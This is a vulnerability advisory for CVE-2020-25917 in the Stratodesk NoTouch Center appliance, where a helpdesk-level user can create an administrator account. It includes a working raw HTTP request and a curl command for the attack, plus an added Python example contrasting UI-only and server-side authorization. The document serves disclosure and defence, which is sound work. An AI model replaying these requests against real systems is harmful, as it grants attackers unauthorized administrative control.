Stratodesk NoTouch Center Privilege Escalation

Posted Dec 21, 2020
Authored by Jeremy Brown

Stratodesk NoTouch Center virtual appliance suffers from a privilege escalation vulnerability. This was addressed in version 4.4.68.

tags | exploit
advisories | CVE-2020-25917
SHA-256 | bc1e49f9a8def3aa6ccdabef93414743d37482014f5ffd7cf5069cef8ed88f82

Stratodesk NoTouch Center Virtual Appliance is a portal for managing NoTouch clients. It appears that Stratodesk has a partnership with ViewSonic and produced these appliances to support some of their hardware devices as well.

- https://www.stratodesk.com/products/notouch-desktop/virtual-appliance/
- https://www.viewsonic.com/eu/products/desktop-virtualization/SC-T25.php

=Authenticated privilege escalation from low privileged user to admin=

The user management security strategy appears to consist only of hiding admin options in the Web UI from unprivileged users; those users can still call the admin-related functions manually. Many different admin requests can be called by non-admin users, all with the same root cause. The add user functionality is simply the highest-impact demonstration of this issue.

A low-privileged user on the platform, for example a user with “helpdesk” privileges (which is level 4 in their system of 1-4 privilege levels with 1=admin), can perform privileged operations, including adding a new administrator to the platform.

Repro

1) Create a low-privileged user
2) Log in as that user and capture the user’s JSESSIONID from the Cookie header
3) Insert that ID in the request below, where the JSESSIONID data is
4) Log in as admin2 and see that you now have admin privileges

POST /easyadmin/user/submitCreateTCUser.do HTTP/1.1
Host: stratodesk-server
Content-Type: application/x-www-form-urlencoded
Content-Length: XX
Cookie: JSESSIONID=[XXXXXXXX...]

func=save&userid=0&name=admin2&fullname=admin2&password=Secret2&seclevel=1

"As cURL command"

curl -i -s -k -X $'POST' \
-H $'Host: stratodesk-server' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: XX' -H $'Cookie: JSESSIONID=XXXXXXXX...' \
-b $'JSESSIONID=XXXXXXXX...' \
--data-binary $'func=save&userid=0&name=admin2&fullname=admin22&password=Secret222&seclevel=1' \
$'https://stratodesk-server/easyadmin/user/submitCreateTCUser.do'

Remediation

Fixed in NoTouch package v4.4.68 (unclear which, if any, OVA releases contain the updated packages)
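
The root cause described above (admin functions hidden in the Web UI but not authorized on the server) is modelled below as an added Python example; it is not Stratodesk's code, the vendor's fix, or part of the original advisory. The session store, policy table, handler names and sample form body are hypothetical; only the endpoint path, the form field names and the 1-4 level scheme come from the advisory.

```python
from urllib.parse import parse_qs

ADMIN = 1  # advisory: levels run 1-4, with 1 = admin and 4 = helpdesk
# Hypothetical session store (constructed): session id -> caller's seclevel.
SESSIONS = {"sess-admin": 1, "sess-helpdesk": 4}
# Hypothetical policy table: path -> least-privileged level allowed to call it.
REQUIRED_LEVEL = {"/easyadmin/user/submitCreateTCUser.do": ADMIN}
USERS = {}  # name -> seclevel; stands in for the user database


def parse_form(body):
    return {k: v[0] for k, v in parse_qs(body).items()}


def create_user_ui_only(session_id, path, body):
    """Flawed pattern: any valid session is accepted; only the UI hides the form."""
    if session_id not in SESSIONS:
        return 401
    form = parse_form(body)
    USERS[form["name"]] = int(form["seclevel"])
    return 200


def create_user_checked(session_id, path, body):
    """Hardened pattern: authorize on the server before changing any state."""
    caller = SESSIONS.get(session_id)
    if caller is None:
        return 401
    # Deny by default: a path missing from the table is treated as admin-only.
    if caller > REQUIRED_LEVEL.get(path, ADMIN):
        return 403
    form = parse_form(body)
    try:
        name, requested = form["name"], int(form["seclevel"])
    except (KeyError, ValueError):
        return 400
    if not 1 <= requested <= 4:
        return 400
    # Second guard, relevant if the table is ever relaxed for this path:
    # never create an account more privileged than the caller's own.
    if requested < caller:
        return 403
    USERS[name] = requested
    return 200


if __name__ == "__main__":
    body = "func=save&userid=0&name=example&seclevel=1"  # constructed form body
    path = "/easyadmin/user/submitCreateTCUser.do"
    print(create_user_ui_only("sess-helpdesk", path, body))
    print(create_user_checked("sess-helpdesk", path, body))
```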

CVE-2020-25917

Discovered and disclosed by Jeremy Brown / December 2020